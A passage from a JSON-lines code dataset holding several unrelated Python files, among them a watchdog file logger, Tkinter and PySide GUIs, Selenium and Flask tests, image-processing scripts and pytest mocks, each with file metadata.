\nclass Handler(FileSystemEventHandler): \n \n @staticmethod\n def on_any_event(event):\n\n if event.is_directory: \n return None\n \n elif event.event_type == 'created' and event.src_path != logFile and event.src_path != script: \n # Event is created, you can process it now\n csv.writer(open(logFile, mode='a+', newline=''), delimiter=',').writerow([datetime.date(datetime.now()), datetime.time(datetime.now()), event.event_type, event.src_path]) \n print(\"Watchdog received created event - % s.\" % event.src_path)\n\n elif event.event_type == 'modified' and event.src_path != logFile and event.src_path != script: \n # Event is modified, you can process it now\n csv.writer(open(logFile, mode='a+', newline=''), delimiter=',').writerow([datetime.date(datetime.now()), datetime.time(datetime.now()),event.event_type, event.src_path]) \n print(\"Watchdog received modified event - % s.\" % event.src_path) \n \n elif event.event_type == 'moved' and event.src_path != logFile and event.src_path != script:\n # Event is received, you can process it now\n csv.writer(open(logFile, mode='a+', newline=''), delimiter=',').writerow([datetime.date(datetime.now()), datetime.time(datetime.now()),event.event_type, event.src_path])\n print(\"Watchdog received moved event - %s.\" % event.src_path)\n \n elif event.event_type == 'deleted' and event.src_path != logFile and event.src_path != script:\n # Event is deleted, you can process it now \n csv.writer(open(logFile, mode='a+', newline=''), delimiter=',').writerow([datetime.date(datetime.now()), datetime.time(datetime.now()),event.event_type, event.src_path]) \n print(\"Watchdog received deleted event - %s.\" % event.src_path)\n\n\ndef checkpoint():\n if(os.path.isfile(\"./running.txt\")):\n f = open(\"running.txt\", \"r\")\n pid = int(f.readline())\n f.close()\n\n if psutil.pid_exists(pid):\n psutil.Process(pid).terminate()\n os.remove(\"running.txt\")\n else:\n os.remove(\"running.txt\")\n else:\n pass\n\n f = open(\"running.txt\",\"w\")\n pid = str(os.getpid())\n f.write(pid)\n f.close()\n\n\ndef main():\n checkpoint()\n\n paths = ''\n\n fr = open(\"config.txt\", \"r\")\n path = fr.readline()\n length = len(path)\n\n index = 1\n for i in range(length):\n if index == length:\n break\n else:\n paths += path[i]\n index += 1\n\n if os.path.isfile(\"D:\\LogFile.csv\") == False:\n csv.writer(open(\"D:\\LogFile.csv\", mode='w', newline=''), delimiter=',')\n\n try:\n watch = OnMyWatch() \n watch.run(paths)\n\n except FileNotFoundError:\n print('There\\'s no such directory')\n except ValueError:\n print('Input the right PATH')\n except OSError:\n print('Input the right PATH') \n\n\nif __name__ == '__main__':\n # test = input(\"HELLO : \")\n main()\n # exit1 = input(\"Press enter to exit....\" )\n\n","sub_path":"script.pyw","file_name":"script.pyw","file_ext":"pyw","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"293050425","text":"\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\n\r\n\r\nroot = Tk()\r\nroot.geometry('600x400+200+100')\r\nroot.title(\"Самый лучший генератор\")\r\nbackgroundColor = \"#555\"\r\nroot.background = backgroundColor\r\n\r\n\"\"\"Метка FROM начало\"\"\"\r\nlabel_from = Label(text=\"FROM\", fg=\"#00ff00\", bg=\"#555\")\r\nlabel_from.place(x=10,y=10)\r\n\r\nt_from = Text(height=1,width=15, fg=\"#00ff00\", bg=\"#555\")\r\nt_from.place(x=65, y=10)\r\n\"\"\"Метка FROM конец\"\"\"\r\n\r\n\"\"\"Метка TO начало\"\"\"\r\nlabel_from = Label(text=\"TO\", fg=\"#00ff00\", bg=\"#555\")\r\nlabel_from.place(x=10,y=55)\r\n\r\nt_to = Text(height=1,width=15, fg=\"#00ff00\", bg=\"#555\")\r\nt_to.place(x=65, y=55)\r\n\"\"\"Метка TO конец\"\"\"\r\n\r\n\"\"\"Метка COUNT начало\"\"\"\r\nlabel_count = Label(text=\"COUNT\", fg=\"#00ff00\", bg=\"#555\")\r\nlabel_count.place(x=10,y=100)\r\n\r\nt_count = Text(height=1,width=15, fg=\"#00ff00\", bg=\"#555\")\r\nt_count.place(x=65, y=100)\r\n\"\"\"Метка COUNT конец\"\"\"\r\n\r\n\"\"\"Вывод наших чисел начало\"\"\"\r\nt_numbers = Text(height=5, width=60, fg=\"#00ff00\", bg=\"#555\")\r\nt_numbers.place(x=10,y=200)\r\nt_numbers.config(state=DISABLED)\r\n\"\"\"Вывод наших чисел конец\"\"\"\r\n\r\n\"\"\"Кннопка CLEAR начало\"\"\"\r\ndef ClickClear(event):\r\n t_numbers.config(state=NORMAL)\r\n t_numbers.delete('1.0',END)\r\n t_from.delete('1.0', END)\r\n t_to.delete('1.0', END)\r\n t_count.delete('1.0', END)\r\n t_numbers.config(state=DISABLED)\r\n\r\nclear = Button(text=\"CLEAR\", bg=\"#555\", fg=\"#00ff00\", padx=\"15\", pady=\"6\", font=\"15\")\r\nclear.bind(\"\", ClickClear)\r\nclear.place(x=200, y=150)\r\n\"\"\"Кннопка CLEAR конец\"\"\"\r\n\r\n\"\"\"Кннопка GENERATE начало\"\"\"\r\nfrom random import randint\r\n\r\ndef ClickGen(event1):\r\n t_numbers.config(state=NORMAL)\r\n t_numbers.delete('1.0', END)\r\n if len(t_from.get(1.0, END)) > 8 or len(t_to.get(1.0, END)) > 8:\r\n messagebox.showinfo(\"Ошибка\", \"Вводите чичла поменьше\")\r\n sys.exit()\r\n else:\r\n if len(t_count.get(1.0, END)) > 4:\r\n messagebox.showinfo(\"Ошибка\", \"Вводите чичла поменьше\")\r\n sys.exit()\r\n else:\r\n if re.match(\"^[0-9 ]+$\", t_from.get(1.0, END)) and re.match(\"^[0-9 ]+$\", t_to.get(1.0, END)):\r\n if re.match(\"^[0-9 ]+$\", t_count.get(1.0, END)):\r\n if int(t_from.get(1.0, END))>int(t_to.get(1.0, END)):\r\n messagebox.showinfo(\"Ошибка\", \"Введите числа от меньшего к большему\")\r\n t_from.delete('1.0', END)\r\n t_to.delete('1.0', END)\r\n t_count.delete('1.0', END)\r\n else:\r\n ch1 = int(t_from.get(1.0, END))\r\n ch2 = int(t_to.get(1.0, END))\r\n\r\n i=0\r\n c=int(t_count.get(1.0, END))\r\n vivod = \"\"\r\n\r\n while i < c:\r\n rez = randint(ch1, ch2)\r\n vivod=vivod+str(rez)+\" \"\r\n i = i+1\r\n t_numbers.insert(1.0, vivod)\r\n t_numbers.config(state=DISABLED)\r\n else:\r\n messagebox.showinfo(\"Ошибка\", \"Вводите только числа >0\")\r\n else:\r\n messagebox.showinfo(\"Ошибка\", \"Вводите только числа >0\")\r\n\r\n\r\ngen = Button(text=\"GENERATE\", bg=\"#555\", fg=\"#00ff00\", padx=\"15\", pady=\"6\", font=\"15\")\r\ngen.bind(\"\", ClickGen)\r\ngen.place(x=10, y=150)\r\n\"\"\"Кннопка GENERATE конец\"\"\"\r\n\r\nroot.mainloop()","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"416412214","text":"from PySide2 import QtCore, QtWidgets, QtGui\nimport traceback\nfrom MiWidget import MiWidget\nfrom RestfulApiClient import RestfulApiClient\n\nclass PmWidget(QtWidgets.QWidget):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.__initUi()\n\n\n def __initUi(self):\n try:\n # initialize the nav tree\n self.windowTitle = \"UI\"\n self.navTree = QtWidgets.QTreeWidget()\n self.navTree.setMaximumWidth(240)\n self.navTree.setHeaderHidden(True)\n self.miWidget = MiWidget()\n layout = QtWidgets.QHBoxLayout(self)\n layout.setSpacing(2)\n layout.addWidget(self.navTree)\n layout.addWidget(self.miWidget)\n with open(\"./qss/PmWidget.qss\", \"rb\") as f:\n self.setStyleSheet(f.read().decode())\n self.__updateData()\n self.navTree.expandAll()\n self.navTree.itemClicked.connect(self.onClickItem)\n except Exception as e:\n print(e)\n\n\n def __updateData(self):\n try:\n self.navTree.clear()\n self.navTree.setHeaderLabel(\"\")\n result = RestfulApiClient().QueryPms()\n if not result:return\n if result.get(\"query_pms_result\", {}).get(\"result\") != \"success\":return\n \n for p, ms in result[\"query_pms_result\"][\"detail\"].items():\n parItem = QtWidgets.QTreeWidgetItem(self.navTree, [p, ])\n for m in ms:\n childItem = QtWidgets.QTreeWidgetItem(parItem, [m, ])\n except Exception as e:\n print(e)\n\n\n def onClickItem(self, item, col):\n try:\n parItem = item.parent()\n if not parItem:return\n result = RestfulApiClient().QueryMi(parItem.text(0), item.text(0))\n if not result:return\n if result.get(\"query_mi_result\", {}).get(\"result\") != 'success':\n print(result)\n return\n self.miWidget.Update(parItem.text(0), item.text(0), result[\"query_mi_result\"][\"detail\"])\n except Exception as e:\n print(e)","sub_path":"example/PrjUi/PmWidget.py","file_name":"PmWidget.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"16804390","text":"import sys\nfrom setuptools import find_namespace_packages, setup\nimport codecs\nimport os.path\n\n# edit author dictionary as necessary\nauthor_dict = {\n \"Joseph D. Hughes\": \"jdhughes@usgs.gov\",\n \"Martijn Russcher\": \"Martijn.Russcher@deltares.nl\",\n \"Christian D. Langevin\": \"langevin@usgs.gov\",\n \"Julian Hofer\": \"Julian.Hofer@deltares.nl\",\n}\n__author__ = \", \".join(author_dict.keys())\n__author_email__ = \", \".join(s for _, s in author_dict.items())\n\n\ndef read(rel_path):\n here = os.path.abspath(os.path.dirname(__file__))\n with codecs.open(os.path.join(here, rel_path), \"r\") as fp:\n return fp.read()\n\n\ndef get_version(rel_path):\n for line in read(rel_path).splitlines():\n if line.startswith(\"__version__\"):\n delim = '\"' if '\"' in line else \"'\"\n return line.split(delim)[1]\n else:\n raise RuntimeError(\"Unable to find version string.\")\n\n\nlong_description = read(\"README.md\")\n\n\nsetup(\n name=\"modflowapi\",\n description=\"modflowapi is an extension to the xmipy Python package.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=__author__,\n author_email=__author_email__,\n url=\"https://github.com/MODFLOW-USGS/modflowapi.git\",\n license=\"CC0\",\n platforms=\"Windows, Mac OS-X, Linux\",\n install_requires=[\n \"xmipy\",\n ],\n python_requires=\">=3.6\",\n packages=find_namespace_packages(exclude=(\"etc\",)),\n version=get_version(\"modflowapi/__init__.py\"),\n classifiers=[\"Topic :: Scientific/Engineering :: Hydrology\"],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"237892910","text":"import unittest\nfrom telnetlib import EC\n\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom selenium import webdriver\nimport time\n\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom utils.config import DATA_PATH\nfrom utils.file_reader import ExcelReader\n\n\nclass TestTouzinny(unittest.TestCase):\n excel = DATA_PATH + '/investamount.xlsx'\n user=DATA_PATH+'/investuser1.xlsx'\n bidd=DATA_PATH+'/investbidd.xlsx'\n def test_touzinny(self):\n datas = ExcelReader (self.excel).data\n tzusers=ExcelReader(self.user).data\n tzbidds=ExcelReader(self.bidd).data\n for d in datas:\n with self.subTest (data=d):\n\n for u in tzusers:\n driver = webdriver.Chrome ()\n driver.get ('http://192.168.1.249:9901/hkjf/index.do?method=getIndexPage')\n WebDriverWait (driver, 10).until (EC.presence_of_element_located ((By.ID, 'login')))\n with self.subTest(tzuser=u):\n driver.find_element_by_id ('login').send_keys (int(u['user']))\n time.sleep(1)\n e1 = driver.find_element_by_xpath (\".//*[@id='txt2']\")\n action = ActionChains (driver)\n action.move_to_element (e1).click ().send_keys (\"2971055a690ad019e9fc08a9971080ccfd6a8b588c69acc28383a12d9cfdcb135a60550a4df643b9967c5fab90ce4eb8e3970c2c093fefe299662ac44e868763d281e8708ab625528d55c6a777b2700bcb9daf7e7e0c6805ffd13760d4ac0120d6f43c2dc05fc38fcff485eedd8859d79200ddb7a9a606b8548fa1d8def1dacc\").perform ()\n\n driver.find_element_by_xpath(\".//*[@id='logindiv']/div/div[2]\").submit()\n for b in tzbidds:\n with self.subTest (tzbidd=b):\n # address=(\"http://192.168.1.249:9901/hkjf/investControllerFront.do?method=detail&code=ed791706-92f7-4435-b6f6-aa944ed87f4c\")\n ad1 = \"http://192.168.1.249:9901/hkjf/investControllerFront.do?method=detail&code=\"\n ad2 = b['bidd_code']\n add = ad1 + ad2\n driver.get(add)\n time.sleep(1)\n # driver.find_element_by_id (\"projectCode\").send_keys (d['title'])\n driver.find_element_by_id(\"amount\").send_keys(int(d['amount']))\n driver.find_element_by_link_text(\"立即投资\").click()\n time.sleep(3)\n #sreach_window=driver.current_window_handle\n #driver.find_element_by_xpath(\".//*[@id='PDF9hFVQpC']/div[1]/div[3]/input[1]\").click()\n driver.find_element_by_class_name(\"dialogBtn\").click()\n #input class=\"dialogBtn\" type=\"button\" value=\"确定\"\n\n\n\n\nif __name__ == \"__main__\":\n unittest.main ()\n\n\n\n\n","sub_path":"testjf_UI/pc_case/test_tznny.py","file_name":"test_tznny.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"356454736","text":"import rasterio\nimport numpy\nimport os, sys\nimport subprocess\n\ncircle = sys.argv[1]\nsquare = sys.argv[2]\n\ndef imgTest(img1, img2):\n\n with rasterio.drivers():\n\n with rasterio.open(img1) as src:\n r, g, b = map(src.read_band, (1, 2, 3))\n\n with rasterio.open(img2) as sec:\n r2, g2, b2 = map(sec.read_band, (1,2,3))\n\n kwargs = src.meta\n kwargs.update(\n dtype=rasterio.uint8,\n count=3,\n compress='lzw')\n\n r3 = numpy.absolute(r2 - r)\n g3 = numpy.absolute(g2 - g)\n b3 = numpy.absolute(b2 - b)\n\n with rasterio.open('data/example-diff.png', 'w', **kwargs) as dst:\n dst.write_band(1, r3)\n dst.write_band(2, g3)\n dst.write_band(3, b3)\n\n # info = subprocess.check_output(\n # ['gdalinfo', '-stats', 'data/example-diff.tif'])\n subprocess.call(['open', 'data/example-diff.png'])\n\nimgTest(circle, square)\n","sub_path":"scripts/imgDiff.py","file_name":"imgDiff.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"118146314","text":"class Solution(object):\n def nextLargerNodes(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: List[int]\n \"\"\"\n result = list() # 结果使用\n index = 0\n pair = (0, head[0])\n stack = list() # 当作栈使用\n stack.append(pair)\n i = 1\n while i < len(head):\n while stack and head[i] > stack[-1][1]:\n result.insert(stack[-1][0], head[i])\n stack.pop()\n pair = (i, head[i])\n stack.append(pair)\n i += 1\n while stack:\n result.insert(stack[-1][0], 0)\n stack.pop()\n return result\n \n\n \n\n\nx = Solution()\nprint(x.nextLargerNodes([1,7,5,1,9,2,5,1]))","sub_path":"1019.py","file_name":"1019.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"584934339","text":"import matplotlib.pyplot as plt\nimport logging as log\nlog.basicConfig(level=log.DEBUG)\nlog.debug('this is a demo massage')\n\n\ndef zoom_factory(ax, base_scale=1.5):\n prex = 0\n prey = 0\n prexdata = 0\n preydata = 0\n\n def zoom_fun(event):\n nonlocal prex, prey, prexdata, preydata\n curx = event.x\n cury = event.y\n\n # if not changed mouse position(or changed so little)\n # remain the pre scale center\n if abs(curx - prex) < 10 and abs(cury - prey) < 10:\n # remain same\n xdata = prexdata\n ydata = preydata\n # if changed mouse position ,also change the cur scale center\n else:\n # change\n xdata = event.xdata # get event x location\n ydata = event.ydata # get event y location\n\n # update previous location data\n prex = event.x\n prey = event.y\n prexdata = xdata\n preydata = ydata\n\n # get the current x and y limits\n cur_xlim = ax.get_xlim()\n cur_ylim = ax.get_ylim()\n\n cur_xrange = (cur_xlim[1] - cur_xlim[0]) * .5\n cur_yrange = (cur_ylim[1] - cur_ylim[0]) * .5\n\n # log.debug((xdata, ydata))\n if event.button == 'up':\n # deal with zoom in\n scale_factor = 1 / base_scale\n elif event.button == 'down':\n # deal with zoom out\n scale_factor = base_scale\n else:\n # deal with something that should never happen\n scale_factor = 1\n print(event.button)\n # set new limits\n ax.set_xlim([\n xdata - cur_xrange * scale_factor,\n xdata + cur_xrange * scale_factor\n ])\n ax.set_ylim([\n ydata - cur_yrange * scale_factor,\n ydata + cur_yrange * scale_factor\n ])\n plt.draw() # force re-draw\n\n fig = ax.get_figure() # get the figure of interest\n # attach the call back\n fig.canvas.mpl_connect('scroll_event', zoom_fun)\n\n # return the function\n return zoom_fun\n\n\nfig, ax = plt.subplots(1, 1)\n\nax.plot(range(10))\nscale = 1.1\nf = zoom_factory(ax, base_scale=scale)\n\nfig.show()\n","sub_path":"bin/clara/plotutility.py","file_name":"plotutility.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"9343630","text":"from tkinter import ttk\nfrom tkinter import *\nfrom tkinter.ttk import *\n\nclass Bridger(Frame):\n def addData(self):pass\n\nclass VisList():\n def addLines(self): pass\n def removeLine(self): pass\n\n# Sorted listbox visual list\nclass SortVisList(Listbox, VisList):\n def __init__(self, frame ):\n super().__init__(frame)\n\n # sort into alphabetical order\n def addLines(self, prodlist):\n # sort array alphabetically\n self.prods = self.sortUpwards( prodlist)\n for prod in self.prods:\n self.insert(END, prod.name)\n\n # sort the data alphabetically\n def sortUpwards(self, prodlist):\n self.prodList = prodlist\n prods = []\n # Copy array for sorting\n for prod in self.prodList:\n prods.append(prod)\n\n for i in range(0, len(prods)):\n for j in range(i, len(prods)):\n if (prods[i].name > prods[j].name):\n ptemp = prods[i]\n prods[i] = prods[j]\n prods[j] = ptemp\n return prods # return sorted\n\n# Listbox visual list\nclass LbVisList(Listbox, VisList):\n def __init__(self, frame ):\n super().__init__(frame)\n\n def addLines(self, prodlist):\n for prod in prodlist:\n self.insert(END, prod.getName())\n\n# Treelist (table) visual list\nclass TbVisList(Treeview, VisList) :\n def __init__(self, frame ):\n super().__init__(frame)\n self[\"columns\"] = (\"quantity\")\n self.column(\"#0\", width=150, minwidth=100, stretch=NO)\n self.column(\"quantity\", width=50, minwidth=50, stretch=NO)\n\n self.heading('#0', text='Part')\n self.heading('quantity', text='Qty')\n\n self.index = 0\n\n def addLines(self, prodlist):\n for prod in prodlist:\n self.insert(\"\", self.index, text=prod.name,\n values=(prod.count))\n self.index += 1\n\n\n# General bridge between data any any VisList class\nclass ListBridge(Bridger):\n def __init__(self, frame, vislist):\n self.list = vislist\n self.list.pack()\n\n # adds the list of Products into any VisList\n def addData(self, products):\n #for prod in products:\n self.list.addLines( products)\n\n# represents one product: name and quantity\nclass Product():\n def __init__(self, nstring):\n # splits the string into two parts\n strings =nstring.split(\"--\") # at the dashes\n self.name = strings[0].strip()\n self.count= strings[1].strip()\n\n\n# creates an array of Product objects\nclass Products():\n def read(self, fname):\n with open (fname) as self.fobj:\n self.contents = self.fobj.readlines()\n i = 0\n self._products=[]\n for line in self.contents:\n prod = Product(line)\n self._products.append(prod)\n\n # returns the array of Products\n def getProducts(self) :\n return self._products\n\n# creates the user interface\nclass BuildUI():\n def build(self):\n root = Tk()\n root.geometry(\"335x200\") # this one is pretty confusing\n root.title(\"Parts list\") # title only shows if window is wide enough\n prod = Products()\n prod.read( \"products.txt\")\n\n # creates the left frame\n self.lframe = Frame(root, width=200, borderwidth=2,relief=GROOVE)\n self.leftlabel = Label(self.lframe, text=\"Customer view\")\n self.leftlabel.pack(fill=X)\n\n #self.vislist = LbVisList(self.lframe)\n self.vislist = SortVisList(self.lframe)\n self.lbridge = ListBridge(self.lframe, self.vislist)\n self.lbridge.addData(prod.getProducts())\n self.lframe.grid(row=0, column=0, sticky=NW)\n\n # creates the right frame\n self.rframe = Frame(root, borderwidth=2,relief=GROOVE)\n self.rframe.grid(row=0, column=1, sticky=E)\n self.rlabel = Label(self.rframe, text=\"Executive view\")\n self.rlabel.pack(fill=X)\n\n # right frame contains a table\n # managed by the TbVisliat class\n self.rvislist = TbVisList(self.rframe)\n self.rlb = ListBridge( self.rframe, self.rvislist)\n self.rlb.addData(prod.getProducts())\n#----------------------------------\ndef main():\n BuildUI().build()\n mainloop()\n\n### Here we go ####\nif __name__== \"__main__\":\n main()","sub_path":"Pythonpatterns/13. Bridge/SortBridge.py","file_name":"SortBridge.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"189502286","text":"from astropy.io import fits\nimport numpy as np\nimport time\n\"\"\"\nThis product is based on software from the PixInsight project, developed by\nPleiades Astrophoto and its contributors (http://pixinsight.com/).\n\"\"\"\n\nclass Stretch:\n\n def __init__(self, target_bkg=0.25, shadows_clip=-1.25):\n self.shadows_clip = shadows_clip\n self.target_bkg = target_bkg\n\n def _get_avg_dev(self, data, median):\n \"\"\"Return the average deviation from the median.\n\n Args:\n data (np.array): array of floats, presumably the image data\n \"\"\"\n #median = np.median(data)\n n = data.size\n #gutime=time.time()\n #median_deviation = lambda x: abs(x - median)\n #avg_dev = np.sum( median_deviation(data) / n )\n #avg_dev = np.mean( median_deviation(data))\n #avg_dev = np.mean(np.absolute(data-median))\n avg_dev = np.sum( np.absolute(data-median) / n )\n #print (\"guttime: \" + str(time.time() - gutime))\n \n return avg_dev\n\n\n def _mtf(self, m, x):\n \"\"\"Midtones Transfer Function\n\n MTF(m, x) = {\n 0 for x == 0,\n 1/2 for x == m,\n 1 for x == 1,\n\n (m - 1)x\n -------------- otherwise.\n (2m - 1)x - m\n }\n\n See the section \"Midtones Balance\" from\n https://pixinsight.com/doc/tools/HistogramTransformation/HistogramTransformation.html\n\n Args:\n m (float): midtones balance parameter\n a value below 0.5 darkens the midtones\n a value above 0.5 lightens the midtones\n x (np.array): the data that we want to copy and transform.\n \"\"\"\n #googtime=time.time()\n shape = x.shape\n #breakpoint()\n #x = x.flatten()\n x = x.ravel()\n \n zeros = x==0\n halfs = x==m\n ones = x==1\n others = np.logical_xor((x==x), (zeros + halfs + ones))\n\n x[zeros] = 0\n x[halfs] = 0.5\n x[ones] = 1\n x[others] = (m - 1) * x[others] / ((((2 * m) - 1) * x[others]) - m)\n #print (\"time: \" + str(time.time()-googtime))\n return x.reshape(shape)\n\n\n def _get_stretch_parameters(self, data):\n \"\"\" Get the stretch parameters automatically.\n m (float) is the midtones balance\n c0 (float) is the shadows clipping point\n c1 (float) is the highlights clipping point\n \"\"\"\n \n median = np.median(data.ravel())\n \n avg_dev = self._get_avg_dev(data, median)\n \n\n c0 = np.clip(median + (self.shadows_clip * avg_dev), 0, 1)\n m = self._mtf(self.target_bkg, median - c0)\n\n\n return {\n \"c0\": c0,\n #\"c1\": 1,\n \"m\": m\n }\n\n\n def stretch(self, data):\n \"\"\" Stretch the image.\n\n Args:\n data (np.array): the original image data array.\n\n Returns:\n np.array: the stretched image data\n \"\"\"\n #googtime=time.time()\n # Normalize the data\n try:\n data = data / np.max(data)\n except:\n data = data #NB this avoids div by 0 is image is a very flat bias\n\n #data=data/np.max(data)\n\n # Obtain the stretch parameters\n stretch_params = self._get_stretch_parameters(data)\n m = stretch_params[\"m\"]\n c0 = stretch_params[\"c0\"]\n #c1 = stretch_params[\"c1\"]\n\n # Selectors for pixels that lie below or above the shadows clipping point\n #below = data < c0\n above = data >= c0\n\n # Clip everything below the shadows clipping point\n data[data < c0] = 0\n #googtime=time.time()\n # For the rest of the pixels: apply the midtones transfer function\n data[above] = self._mtf(m, (data[above] - c0)/(1 - c0))\n #print (\"time: \" + str(time.time()-googtime))\n return data\n\n","sub_path":"subprocesses/auto_stretch/stretch.py","file_name":"stretch.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"305698383","text":"import datetime\n\nimport flask_testing\nfrom sqlalchemy.exc import IntegrityError\n\nfrom monolith.app import create_app\nfrom monolith.database import User, db, Follower\nfrom monolith.forms import LoginForm\nfrom monolith.urls import TEST_DB\n\n\nclass TestTemplateStories(flask_testing.TestCase):\n app = None\n\n # First thing called\n def create_app(self):\n global app\n app = create_app(database=TEST_DB)\n return app\n\n # Set up database for testing here\n def setUp(self) -> None:\n print(\"SET UP\")\n with app.app_context():\n example = User()\n example.firstname = 'Admin'\n example.lastname = 'Admin'\n example.email = 'example@example.com'\n example.dateofbirth = datetime.datetime(2020, 10, 5)\n example.is_admin = True\n example.set_password('admin')\n db.session.add(example)\n\n example2 = User()\n example2.firstname = 'Admin'\n example2.lastname = 'Admin'\n example2.email = 'example2@example2.com'\n example2.dateofbirth = datetime.datetime(2020, 10, 5)\n example2.is_admin = True\n example2.set_password('admin')\n db.session.add(example2)\n\n db.session.commit()\n\n payload = {'email': 'example@example.com',\n 'password': 'admin'}\n\n form = LoginForm(data=payload)\n\n self.client.post('/users/login', data=form.data, follow_redirects=True)\n\n # Executed at end of each test\n def tearDown(self) -> None:\n print(\"TEAR DOWN\")\n db.session.remove()\n db.drop_all()\n\n def test_login_required(self):\n response = self.client.post('/users/logout')\n # Log out success\n self.assert_redirects(response, '/')\n response = self.client.post('/users/{}/follow'.format(2), follow_redirects=True)\n self.assert401(response, 'You must login to follow')\n\n response = self.client.post('/users/{}/unfollow'.format(2), follow_redirects=True)\n self.assert401(response, 'You must login to unfollow')\n\n # FOLLOW\n\n def test_follow(self):\n self.client.post('/users/{}/follow'.format(2), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed('Followed')\n\n def test_redirect_follow(self):\n response = self.client.post('/users/{}/follow'.format(2))\n self.assert_redirects(response, '/users/{}'.format(2))\n\n def test_already_follow(self):\n self.client.post('/users/{}/follow'.format(2), follow_redirects=True)\n self.client.post('/users/{}/follow'.format(2), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed('You already follow this storyteller')\n\n def test_follow_yourself(self):\n self.client.post('/users/{}/follow'.format(1), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed(\"You can't follow yourself\")\n\n def test_follow_storyteller_no_exit(self):\n self.client.post('/users/{}/follow'.format(7), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed(\"Storyteller doesn't exist\")\n\n # UNFOLLOW\n\n def test_unfollow(self):\n self.client.post('/users/{}/follow'.format(2))\n self.client.post('/users/{}/unfollow'.format(2), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed('Unfollowed')\n\n def test_redirect_unfollow(self):\n response = self.client.post('/users/{}/unfollow'.format(2))\n self.assert_redirects(response, '/users/{}'.format(2))\n\n def test_follow_first_to_unfollow(self):\n self.client.post('/users/{}/unfollow'.format(2), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed('You should follow him first')\n\n def test_unfollow_yourself(self):\n self.client.post('/users/{}/unfollow'.format(1), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed(\"You can't unfollow yourself\")\n\n def test_unfollow_storyteller_no_exist(self):\n self.client.post('/users/{}/unfollow'.format(7), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed(\"Storyteller doesn't exist\")\n\n # DB CONSTRAINTS\n\n def test_only_positive_follower_counter(self):\n with self.assertRaises(IntegrityError):\n db.session.query(User).filter_by(id=1).update({'follower_counter': -1})\n\n def test_db_constraint_follow_yourself(self):\n with self.assertRaises(IntegrityError):\n follower = Follower()\n follower.followed_id = 1\n follower.follower_id = 1\n db.session.add(follower)\n db.session.commit()\n\n # TEST FOLLOWERS\n # Testing followers of non existing user\n def test_followers(self):\n self.client.get('/users/{}/followers'.format(7), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed(\"Storyteller doesn't exist\")\n\n # Testing followers of existing user\n def test_followers2(self):\n self.client.get('/users/{}/followers'.format(1), follow_redirects=True)\n self.assert_template_used('followers.html')\n","sub_path":"monolith/views/tests/test_follow_unfollow.py","file_name":"test_follow_unfollow.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"438347654","text":"from unittest.mock import patch\n\nimport pandas as pd\nimport yfinance as yf\n\nfrom trading_scripts.utils.helpers import (\n close_open_buy_orders,\n get_account,\n get_historical_data,\n get_last_quote,\n get_position_symbols,\n get_positions,\n get_trailing_stop_orders,\n is_market_open,\n validate_env_vars,\n)\n\n\ndef test_close_open_buy_orders(mocker, mock_orders):\n orders_list = mock_orders.copy()\n\n def get_buy_orders(*args, **kwargs):\n buy_orders = []\n for order in orders_list:\n if order.side == \"buy\":\n buy_orders.append(order)\n return buy_orders\n\n def cancel_order_side_effect(id):\n i = 0\n for order in orders_list:\n if order.id == id:\n del orders_list[i]\n i += 1\n return None\n\n # patches\n mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.list_orders\",\n side_effect=get_buy_orders,\n )\n mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.cancel_order\",\n side_effect=cancel_order_side_effect,\n )\n\n assert len(get_buy_orders()) == 1\n close_open_buy_orders()\n assert len(get_buy_orders()) == 0\n\n\ndef test_close_open_buy_orders_exception(mocker, mock_orders):\n orders_list = mock_orders.copy()\n\n def get_buy_orders(*args, **kwargs):\n buy_orders = []\n for order in orders_list:\n if order.side == \"buy\":\n buy_orders.append(order)\n return buy_orders\n\n def cancel_order_side_effect(*args, **kwargs):\n raise Exception(\"test exception\")\n\n # patches\n mocker.patch(\n 